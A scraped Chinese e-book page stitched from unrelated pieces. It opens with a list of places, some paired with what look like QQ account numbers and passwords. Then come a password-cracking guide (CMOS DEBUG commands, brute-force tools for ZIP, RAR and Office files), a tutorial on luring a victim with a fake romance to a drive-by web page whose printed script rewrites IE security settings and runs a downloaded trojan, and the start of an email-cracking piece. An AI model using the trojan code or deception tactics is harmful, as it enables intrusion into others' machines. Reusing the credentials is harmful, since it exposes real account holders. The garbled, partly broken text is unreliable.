第二书包网

收藏备用网址www.dier22.com不迷路
繁体版 简体版
第二书包网 > 灯吹鬼 > 5 利用破解软件.

5 利用破解软件.

472143621shi@江苏省南京市电信

河南省漯河市双龙柳江路中段华清网吧

陕西省西安市临潼区人民东路汉宫网城

广东省东莞市电信ADSL

浙江省电信

重庆市电信ADSL

欧洲

江苏省苏州市电信

广西柳州市电信

393554825#湖北省黄石市四门太古网吧

欧洲

湖南省邵阳市

543895900z2286541..欧洲

湖南省邵阳市

784399491a2b3c4d

湖北省黄石市网事春秋网吧

湖南省岳阳市电信

江西省南昌市电信

辽宁省葫芦岛市网通ADSL

辽宁省鞍山市(海城市)网通ADSL

浙江省电信

欧洲

甘肃省酒泉市/临夏市/合作市电信

云南省临沧地区电信

广东省高州市电信

辽宁省大连市金州区ADSL

浙江省金华市

海南省

江苏省徐州市易语网吧

辽宁省大连市金州区ADSL

内蒙古锡林浩特市新纪元网吧

河南省平顶山市

天津市河东区网通ADSL

安徽省淮北市电信ADSL

广西南宁市电信ADSL

河南省新乡市有线通

吉林省延吉市延边朝鲜族自治州

河北省

福建省永安市

福建省泉州市电信

重庆市渝北区电信

湖北省孝感市

广东省东莞市电信

2378190137758991

浙江省嘉兴市桐乡零点网吧

陕西省渭南市

广东省高州市电信

甘肃省兰州市电信ADSL

欧洲

辽宁省大连市ADSL

5786923662201998

江苏省无锡市东亭蕾蕾网吧

江苏省南通市电信ADSL

359724696feng123321

江苏省连云港市

欧洲

%2D%2D%2D%2D%2D%2D%2D%2D%44%,

河北省廊坊市网通ADSL

河北省张家口市电信

河南省信阳市潢川县东方快车网吧

广东省揭阳市/普宁市

278478754&*&@%##河南省三门峡市

山东省临沂市网通

四川省成都市电信

重庆市渝北区电信

澳大利亚

四川省宜宾市网通

广东省高州市电信

广西桂平市电信

欧洲

黑龙江省哈尔滨市网通ADSL

欧洲

河南省洛阳市电信

江苏省苏州市电信

安徽省宿州市电信

甘肃省天水市电信

山东省临沂市

广东省深圳市

浙江省温州市电信

浙江省慈溪市

845718468qs123456

浙江省电信

江苏省苏州市电信

山东省网通

黑龙江省双鸭山市友谊县胡斌网络

云南省临沧市电信

河南省南阳市

欧洲

浙江省电信

290422543wx13177141713

广东省茂名市ADSL

河北省石家庄市网通

甘肃省酒泉市

辽宁省大连市开发区ADSL

河南省ADSL

安徽省淮北市海孜矿流星雨网吧

天津市网通

湖北省武汉市

新疆乌鲁木齐市电信ADSL

浙江省温州市电信

浙江省电信

欧洲

河南省洛阳市网通ADSL

辽宁省沈阳市网通

广东省珠海市电信

浙江省杭州市/湖州市网通

欧洲

广西梧州市

甘肃省合作市

江西省南昌市电信

福建省福州市电信ADSL

辽宁省鞍山市海城市网通

5531206062588hanhanwen?河南省平顶山市/商丘市网通

辽宁省大连市ADSL

116858245tzyhj5889002!广西桂林市桂青路园林网吧

北京市电信通

吉林省吉林市网通

河北省秦皇岛市网通ADSL

广东省广州市荔湾区

河北省保定市网通

黑龙江省网通

河南省新密市

浙江省台州市电信

甘肃省白银市传奇网吧

河北省保定市职工大学附近飞雨网吧

广西电信

河南省网通

广西南宁市电信ADSL

欧洲

吉林省松原市网通

江苏省

河北省保定市(涿州市)网通

江西省景德镇市电信ADSL

黑龙江省佳木斯市富锦市网通

河南省郑州市新郑市网络快车网吧

浙江省瑞安市电信

江西省抚州市临川区

河北省唐山市网通

江苏省连云港市电信

江苏省南京市电信

四川省绵阳市网通

江苏省南京市电信

浙江省金华市

广东省深圳市电信ADSL

江苏省无锡市新区冲浪网吧(新区商业街)

四川省电信

浙江省杭州市/宁波市电信

河南省许昌市电信

天津市

广西南宁市(邕宁区)电信ADSL

50358028413840484924

5948094584713*天津市网通ADSL

辽宁省大连市网通ADSL

湖北省武汉市电信ADSL

山西省忻州市

浙江省电信

河北省石家庄市网通

###0山东省泰安市

江苏省连云港市电信

欧洲

内蒙古赤峰市赤峰学院外机场路飞越一部

西藏电信

云南省曲靖市

江西省上饶市(上饶县)电信ADSL

广东省深圳市联通

###.84加拿大

江西省南昌市电信ADSL

河南省网通

内蒙古赤峰市元宝山区网通

欧洲

四川省达州市电信

河南省洛阳市

日本

江苏省苏州市电信

辽宁省网通

陕西省咸阳市三原县

安徽省宿州市电信ADSL

254077396jiyanan555

辽宁省抚顺市网通ADSL

四川省南充市ADSL

河北省秦皇岛市网通ADSL

云南省昆明市电信ADSL

浙江省湖州市德清县电信

辽宁省沈阳市沈河区倾心网吧

韩国

江苏省无锡市

黑龙江省哈尔滨市双城市奔腾网吧

314898786ni

河北省保定市(唐山/定州)网通ADSL

吉林省长春市网通ADSL

中国联通

四川省成都市电信

浙江省杭州市电信

辽宁省丹东市网通 电子书 分享网站

常见计算机密码破解

日常的计算机**作中,我们随时随地都离不开密码——开机要使用CMOS密码、进Windows要使用用户密码、编辑Word文档要设置文档密码……,所有这些都为用户的数据安全提供了必要的安全保障!不过随着密码应用范围的增加,遗忘密码的情况也在与日俱增(谁也无法保证自己绝对不会忘记密码)!在忘记密码之后如何破解这些密码,尽可能减少损失就成为广大用户所关注的一个话题。为方便用户的使用,现将常用计算机密码的破解方法向大家作一简要介绍:

一、开机密码

根据用户设置的不同,开机密码一般分为两种不同情况,一种就是SETUP密码(采用此方式时,系统可直接启动,而仅仅只在进入BIOS设置时要求输入密码);另一种就是SYSTEM密码(采用此方式时,无论是直接启动还是进行BIOS设置都要求输入密码,没有密码将一事无成)。对于用户设置的这两种密码,我们的破解方法是有所区别的:

1、SETUP密码

如果计算机能正常引导,只是不能进入BIOS设置(即设置了SETUP密码),那么我们在遗忘密码之后只需在DOS状态下启动DEBUG,然后输入如下命令即可手工清除密码:

_ o 70 16

_ o 71 16

_ q

另外,不熟悉DEBUG的用户也可下载一个专门破解CMOS密码的工具软件Cmospwd。然后在DOS启动该程序,它就会将用户的CMOS密码显示出来(Cmospwd支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS),使用非常方便。

2、SYSTEM密码

若没有密码根本不能启动计算机(即设置了SYSTEM密码),那我们就无法通过软件来解决密码遗忘的问题了。此时唯一的方法就是打开机箱,给CMOS放电,清除CMOS中的所有内容(当然也就包括密码),然后重新开机进行设置。另外,有些主板设置了CMOS密码清除跳线,将该跳线短接也可达到同样的目的(详情参见主板说明书)。

二、Windows密码

1、Windows启动密码

遗忘Windows的启动密码虽然不会影响系统的启动,但它将导致用户无法进入自己的个人设置,因此破解Windows的启动密码以找回“丢失”的“个­性­”也是很有必要的。为此,我们可删除Windows安装目录下的*.PWL密码文件及Profiles子目录下的所有个人信息文件,然后重新启动Windows,系统就会弹出一个不包含任何用户名的密码设置框,我们无需输入任何内容,直接单击“确定”按钮,Windows密码即被删除。另外,将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon分支下的UserProfiles修改为“0”,然后重新启动Windows也可达到同样的目的。

2、屏幕保护密码

利用系统的屏幕保护功能可以防止他人在自己不在的情况下偷用自己的计算机,从而起到保护数据安全的作用。不过在不配合其它限制功能的情况下,系统的屏幕保护密码是非常脆弱的。我们在遗忘密码之后只需使用“复位”键强行启动计算机(某些设计不完善的屏幕保护程序甚至可以使用Ctrl+Alt+Del强行关闭,其**作就更简单了),然后右击桌面空白处并从弹出的快捷菜单中执行“属­性­”命令,打开“显示属­性­”设置框并单击“屏幕保护”选项卡,最后取消“密码保护”选项即可(取消该选项时无需确认密码)。另外,据说目前市面上还出现了一种专门用于破解屏幕保护密码的光盘。Сhā入该光盘之后,它就会利用Windows的自动运行功能启动保存在光盘上的屏幕保护密码破解程序,对屏幕保护功能的密码进行分析、破译,最后再将密码显示在屏幕上或写到软盘上,这就更方便了(对不起,该功能只是道听途说,本人并没有亲眼见到这样的光盘)。

3、电源管理密码

Windows的电源管理功能也可以设置密码,设置此功能后,系统在从节能状态返回时就会要求输入密码,从而在一定程度上实现保护系统的目的。不过由于电源管理功能的密码与Windows的启动密码完全一样,因此我们只要按照前面的方法破解了Windows的启动密码,其电源管理密码也就不攻自破了。

从上面的介绍中可以看出,Windows的密码保护功能并不完善,无论是开机密码还是屏幕保护、电源管理密码都非常脆弱,我们必须辅之以其他控制措施才能达到防止他人入侵的目的,具体**作请参见相关资料。

三、压缩文件密码

1、WinZip

当用户遗忘ZIP压缩包的密码之后可以下载一个专门破解ZIP压缩包密码的解密软件UZPC(Ultra Zip Password Cracker),利用它帮我们找回丢失的密码。

我们只需执行“Task”菜单的“New”命令,并从弹出的“打开”对话框中选择需要破解密码的ZIP文件,然后UZPC就会打开一个“Preferences”对话框(如图2所示)。用户应从“Archive Files”列表框中选择对ZIP压缩包中哪几个文件进行解密(WinZip具有为同一个ZIP压缩包中的不同文件设置不同密码的功能,不过绝大多数ZIP压缩包都没有使用这一功能,它们通常为所有的文件都设置了相同的密码,因而常见的ZIP密码破解软件都只能处理此类相同密码的ZIP文档,它们往往对同时包含多个密码的ZIP压缩包无效。UZPC则有所不同,它可分别对ZIP压缩包中不同文件的密码单独进行解密,从而更好地满足了广大用户的要求。“Archive Files”列表框就是用于选择同一个ZIP压缩包中包含不同密码的文件的)。

接下来,我们应选择适当的解密方式(主要有“后门方式”、“穷举方式”、“字典方式”和“模式匹配方式”等4种,我们一般采用“Brute Force穷举方式”)。设置完毕之后单击“Next”按钮,系统就会弹出一个“Brute Force Attack Parameter”对话框,要求广大用户对破解密码的参数(如是否包括大小写字母,是否包括数字、空格、符号或包括所有内容,密码的长度等)进行设置。最后单击“Go”按钮,系统就采用穷尽法对所有可能的密码组合进行测试,直至找出最后的结果,使用非常方便。

另外需要说明的,若密码的位数较长,UZPC的测试过程可能会花费较长的时间。为方便用户的使用,UZPC特意提供了临时中断运行和从中断处继续进行测试的功能,我们只需在测试过程中利用“Sāve”按钮将当前的破解状态记录下来,然后就可以放心大胆地中断正在进行的测试而不必担心数据丢失了。此后我们只需在UZPC中单击“Open”按钮,打开上次所作记录,UZPC即会从中断处继续进行查找,从而节约了用户的时间。

2、ARJ

当ARJ压缩包的密码遗忘之后,我们可下载一个专业的ARJ压缩包密码破解软件AAPR(Advanced ARJ Password Recovery),利用它找出ARJ压缩包的密码。AAPR的界面如图4所示,我们只需从“ARJ Password-encrypted File”对话框中选择需要破解的ARJ压缩包,并在“Brute-Force Range Options”对话框中选择密码的范围(同样是设置是否包括大小写字母,是否包括数字、空格、符号或包括所有字符等内容)。最后单击“Start”按钮,系统就采用穷尽法对所有可能的密码组合进行测试,找到密码之后再将其显示出来,使用非常方便!

3、RAR

RAR也是一个非常流行的压缩软件,用户在遗忘RAR压缩包的密码之后可下载一个CRARK软件来对其进行破解。这是一个命令行实用程序,它主要通过命令行来实现对RAR压缩包的密码进行破解。其命令格式为:“CRARK命令行参数 RAR压缩包文件名”。不过事实上我们一般只需直接使用“CRARK RAR压缩包文件名”命令,利用缺省参数即可达到对RAR压缩包的密码进行破解的目的。

附:CRARK有关命令行参数的含义:

-l 指定最小密码长度

-g 指定最大密码长度

-s 使用用户自己的设置

-d 设置主要词典的文件名

-u 设置用户词典的文件名

-p 设置密码进度文件名

四、文字处理软件密码

1、WPS

1) WPS for DOS

老版本的WPS有一个通用密码Ctrl-QIUBOJUN,我们只需采用此密码即可打开所有加密文档,然后再将文档中的内容采用块拷贝方式拷贝到其他文档中即可解决问题(采用通用密码打开文档时所作的修改不能存盘)。

2) WPS 2000

大家都知道,WPS 2000采用了两种不同级别的文档加密方式,即“普通型加密”和“绝密型加密”。它在说明书中谈到,当用户遗忘文档密码之后,若文档采用的是“普通型加密”方式,则可向金山公司的技术人员求救,由他们帮你找出遗忘的密码;若文档采用的是“绝密型加密”方式,密码遗忘之后根本无法解密,不过事实却并非如此。

我们无论是遗忘了“普通型”密码还是“绝密型”密码,都可以下载一个名为EWPR(Edward Wps Password Recovery)的软件对遗忘的密码进行破解。这是一个国人自己编辑的密码破解软件(不过我始终搞不懂为什么有这么多的中国人喜欢编辑英文界面的软件),它提供了“后门方式”、“穷举方式”、“字典方式”和“模式匹配方式”等4种解密方式(对一般用户来说,最有使用价值的还是“穷举方式”),可同时对采用“普通型加密”和“绝密型加密”的文档进行解密(**作方式完全一样)。

具体来说,我们在使用EWPR对WPS 2000文档的密码进行破解时,首先应在“Encrypt WPS 2000 file”对话框中指定所需的WPS 2000文档(如图5所示),并在“Type of Attack”列表框中选择适当的密码破解方式(一般应选择“brute-force”穷举方式)。接下来,应根据具体情况在“Brute-Force Range Options”列表框中选择可能包含的密码范围,并在“Start From”对话框中指定开始进行查找的字符(主要用于从上次中断处继续进行破解)。设置完这些选项之后,我们只需单击“RUN”按钮,EWPR就会采用穷尽法对WPS 2000文档的密码进行破解,使用非常方便(在运行过程中,我们可以通过“Pause”和“Resume”按钮暂时中断运行以及从中断处继续运行)。

2、Office

WPS 2000的密码保护功能并不安全,那么微软的Office又怎样呢?其实微软的安全­性­更不能信赖(Windows、IE等软件的安全­性­问题就是典型教材)。破解Office系列文档的密码的软件多如牛毛,本人最常用的是AOPR(全称为Advanced Office 97 Password Recovery,址)。该软件可同时对微软Office系列中的Word、Excel及Access等软件所生成的密码进行破解,这就免去了用户逐一下载、使用各个单独密码破解软件的苦恼。另外,AOPR可对Word的*.DOT模板文件的密码进行搜索,这是其他类似软件所不具备的!必须说明的是,AOPR是针对Office 97开发的(推出AOPR时,Office 2000还未问世),不过Office 2000文档的格式与Office 97文档的格式基本上没有什么区别,因此我们同样可使用AOPR对Office 2000文档的密码进行破解(至少本人在使用过程中就没有发现什么问题)。

启动AOPR之后,我们只需从“Encrypted Office 97 Document”对话框中选择遗忘密码的Office文档,并在“Brute -Force Range Options”对话框中选择密码的范围,然后再在“Type of Attack”列表框中选择适当的密码破解方式(当然与前面一样选择“Brute- Force”穷举方式),最后单击“Start”按钮,系统就会采用穷尽法对所有可能的密码组合进行测试,找到密码后再将其显示出来(不同软件的使用方法好像都差不多)。怎么样,效果不错吧?

3、Lotus Word Pro

国内使用莲花公司(IBM子公司)的Lotus Word Pro的用户可能并不太多,不过该软件的功能与微软的Word相比毫不逊­色­(在某些方面还要更先进一些),在国外的应用范围非常广泛(国内不少用户经常会收到采用Lotus Word Pro格式的邮件),国内的多数中外合资企业也是使用Lotus Word Pro进行日常的文字处理,因此这里一并将Lotus Word Pro密码破解的方法向大家作一个介绍。当用户遗忘Lotus Word Pro密码之后,我们可以下载一个Wprokeyd(Passwordrecovery for Lotus Word Pro)对其进行破解。

Wprokeyd是一个专门用于破解Lotus Word Pro文档密码的应用程序,我们在启动该程序(如图7所示)之后首先应单击“Settings”按钮,打开“Brute-Force Settings”对话框,对Wprokeyd的破解状态进行设置(主要是在“Password Character Set”列表框中选择密码的范围)。设置完毕之后,我们只需将遗忘密码的Lotus Word Pro文档(*.LWP文件)拖拽到Wprokeyd窗口中,Wprokeyd即会根据用户指定的范围采用穷尽法对所有可能的密码一一进行测试,直到找到密码为止。

二、动手动脑第二方案:

假设此时设在“ SETUP ”状态,碰巧所有的万能密码都无效,那么您虽然可 以正常启动,但却无法进入CMOS SETUP中去修改密码和BIOS设置,那又该怎么办 呢?看看下面的办法吧:

1.简单的DOS下DEBUG破解程序:

用软盘启动进入DOS下,执行Debug程序(你没有,那得去拷贝一个啊)

1)debug

o 70 2e (回车)

o 71 00 (回车)

o 70 2f (回车)

o 71 00 (回车)

然后重新启动,就一进入CMOS进行修改了

2)debug

o 70 10(回车)

o 71 10(回车)

重新启动,电脑会提示CMOS设置出错,按DEL进入CMOS SETUP中发现所有的参 数全变成了缺省值,重新设好参数后,存盘退出BIOS设置.

3、2.借助软件工具的解决办法很容易把CMOS密码给清掉

1).利用PCTOOLS 的组件工具BOOTSAFE

运行BOOTSAFE C:/M,将CMOS信息和引导区信息备份到空白软盘上,形成CMO 和两个文本文件,再用EDIT之类的编辑器将CMO任意修改一 些内容,存盘后用该盘启动,运行BOOTSAFE C:/R,系统会询问是否从软盘恢复C MOS数据(回答YES)和是否从软盘恢复分区表数据(回答NO),最后重新启动, 此时CMOS中所有内容已被清除,您可随心所欲。

2). 利用NORTON 组件工具RESCUE

先用NORTON的RESCUE功能制作一张应急盘,同样使用EDIT之类的编辑器任意 地修改应急盘中文件的内容,存盘后用应急盘启动。再运行应急盘中的 ,在ITEM TO RESTORE中选择恢复CMOS信息(CMOS INFOMATION)一项 ,完成后重新启动,它的基本原理与上面的差不多,都是去掉CMOS中的信息,借 以消掉密码。

3.键盘字符编码破解方法:

如果你实在连DEBUG这样的简单DOS软件都没法找到,那也不要担心,只要有 键盘就行的了啊,且看键盘去CMOS密码的绝妙办法(至于具体的原理这里就不讲 了,只告诉你做的办法)

运行屏幕编辑命令: COPY CON (当然你也可以用象edit这样的编 辑器来写,不过DEBUG没有怎么能保证你有EDIT呢?),然后按住Alt键,在小键 盘上输入:179(松开键,再按下,继续输入),55(重复步骤),136,216,230, 112,176,32,230,113,254,195,128,251,64,117,241,195,最后按+(回车)存盘, 这样也生成了一个20个字节的文件,然 新启动,此时CMOS中所有内容已 被清除,您可以自由的修改里面的东西,当然也包括密码!

三、万能的放电法

有了上面这些解决方案,觉得应该可以了吧,但我还是不放心。如果你的CM OS中处于“ SYSTEM ”状态,又碰巧所有的万能密码都没用,您根本就无法启动 ,就更别说什么软件,DEBUG法,键盘字符编码的办法了,这该怎么办呢?这就需 要用到我们解决CMOS密码的万能办法:放电---放CMOS的电。

放电的办法较为危险一些,因为这需要打开机箱。现在有不少无跳线主板( 如QDI和ABIT),放电最容易,因为无跳线并不是真的无跳线,一般在板子上都留 有一个给CMOS放电的跳线,这样一来,给无跳线主板放电也就易如反掌了。普通 的板子麻烦一些,它们当然也有给CMOS放电的跳线,只是您不知道是哪个罢了( 不要瞎跳和乱跳)。

有主板说明书最好,查一下具体是JP多少,对其放电即 可。要是找不到的话,把CMOS的电池取下来对正负极短接亦可达到预期效果。说 了这么多,我想你的CMOS密码应该已经被搞定了吧!最后祝广大网友顺利的解决 你的CMOS密码,记得最好的办法还是自己记得自己的密码,那就省得麻烦了。而 且,不要利用这些方法去动别人的机器喔!

网页木马的制作方法

这几天在搞代码,很忙,没来给大家讲知识。今天抽空来给大家写几章!

好,下面教大家做木马!

(PS:我在我的博客做的在网吧免费上网的视频,大家学会了吗?很简单!!!)

今天早上刚到学校,就有个同学对我说他的QQ被别人盗了!我于是对他说:“放心,包在我身上,我肯定给你找回来!”其实我心里也没底,对方既然能偷OICQ,那么多少会有点安全意识的!

放学回家后,打开我的QQ,看到同学的头像正好亮着,查一下IP,好像和我在同一个城市。根据后边的端口号初步判断这家伙可能是在网吧(因为不是默认的4000,4001或5000)。我放弃了入侵他的念头,因为我们这里的网吧大部分用的是98,而98又很难入侵,所以我决定换一种方法。

经过20多分钟的苦思冥想终于被我想到了一种方法。要让他浏览网页,然后染上木马。之后就…………

但这里有三个问题需要解决:

1,如何让对方乖乖的浏览网页。

2,对方在局域网内,用普通的木马肯定不行。

3,如果木马的服务端过大,很容易被发现。

其实第一个问题很容易解决,只要装作一个清纯MM或GG欺骗对方感情就行了。第二条也不算太难,用个反弹式的木马就行了。但这第三条却不太容易解决,因为现在的反弹木马最小的也要30多KB,如果把它放在网页上让对方浏览的话,肯定会出现一个下载框在屏幕上“晃悠”半天。但经过我前面20多分钟的思考,我终于想出了如下的解决办法:

1,申请一个主页空间。

2,配置的服务端。你也许会问,这个木马并不是反弹式的木马啊,为什么要用它呢?别急,我之所以要用它的原因有二。一是它的服务端非常的小,才5KB左右。二是因为它里面有一个非常有用的功能。(如图一所示)看到我用红­色­圈起来的那部分了么?那就是我说的有用的功能,其中DownExec的意思是:“当winshell运行的时候自动下载可执行文件并运行。”Url Address是可执行文件的地址。Destination Filename是下载后的文件名。那么,当对方运行了我们配置好的winshell的时候,就可以让他神不知鬼不觉得去下载真正并且庞大的反弹式木马的服务端了!

3,将winshell加再网页中,然后把网页,winshell,和命名为的反弹木马服务端一起上传到(我这里用的是灰鸽子)。

之后我利用“美人计”让那小子乖乖的浏览了我的网页。图二就是证据!

至于如何在网页中加入木马程序,在这里只说说我从网上找到的一种方法,其他的自己去研究吧!

具体方法如下:

开启第一个HTML的页面,通过恶意的HTML代码把IE安全级别里的默认的“禁用下栽未签名的ActiveX控件”选项,变为“启用下栽未签名的ActiveX控件”,然后马上打开第二个HTML的文件内容是下载一个未签名的ActiveX控件,实质就是我们所要执行的EXE文件。

将如下代码保存为文件:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML ;>

<CNTER><HTML><HEAD>

<META http-equiv=Content-Type content="text/html; charset=gb2312">

<META content="Microsoft FrontPage ; name=GENERATOR></HEAD>

<BODY>

<SCRIPT>

("<APPLET HEIGHT=0 WIDTH=0 code=;</APPLET>");

function f(){

try

//ActiveX initialization

a1=[0];

("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

();

Shl = ();

("{0D43FE01-F093-11CF-8940-00A0C9054228}");

();

FSO = ();

("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

();

Net = ();

try

if (("Chg") == -1)

("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004",0,"REG_DWORD");

var expdate = new Date((new Date()).getTime() + (1));

;Chg=general; expires=" + () + "; path=/;"

catch(e)

{}

catch(e)

{}

function init()

setTimeout("f()", 1000);

init();

</SCRIPT>

<script language="jāvascript">

<!-- Begin

function opencolortext(){

(’http://’,’colortext’)

setTimeout("opencolortext()",1500)

// End -->

</script>

</BODY></HTML>

下面制作文件:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML ;>

<HTML><HEAD>

<META http-equiv=Content-Type content="text/html; charset=gb2312">

<SCRIPT language=jāvascript>

run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""

run_exe+="CODEBASE=\"#version=1,1,1,1\">"

run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"

run_exe+="</OBJECT>"

run_exe+="<HTML><H1> </H1></HTML>";

();

();

ln(run_exe);

();

</SCRIPT>

<META content="Microsoft FrontPage ; name=GENERATOR></HEAD>

<BODY>

<p align="center">论坛连接中请勿终断....

<CENTER></CENTER>

</BODY></HTML>

其中就是我们要执行的文件。至于那个“论坛连接中请勿终断....”完全是为了迷惑对方,可根据自己喜好而定。接下来只要将,和一起上传到主页的同一目录中就ok了!

总结:这个方法的好处是,如果对方在局域网内,我们同样可以用木马进入他的机器并且很难发现。但这个方法也有自己的缺点,那就是用了两种木马,大大的增大了被杀毒软件查杀的几率。不过对方是在网吧中,而我们这里的网吧大多又不安装杀毒软件(用硬盘还原卡代替),并且不升级IE,我这次入侵成功,网吧老板也有一份功劳! txt小说上传分享

破解Email账号的三种方法

电子邮件并不是安全的,在邮件的发送、传送和接收整个过程中的每个环节都可能存在薄弱环节,恶意用户如果利用其漏洞,就能够轻易的破解出账号,获得邮件内容。

一、利用邮件服务器­操­作系统的漏洞

邮件服务器软件是运行在特定的­操­作系统上的,如Linux、Windows NT/2000等。这些­操­作系统的默认安装和配置都是不安全的,黑客可以轻易入侵系统,获得所有用户名和密码。

0 0

一秒记住www点dier22点com,最新小说等你来
『加入书签,方便阅读』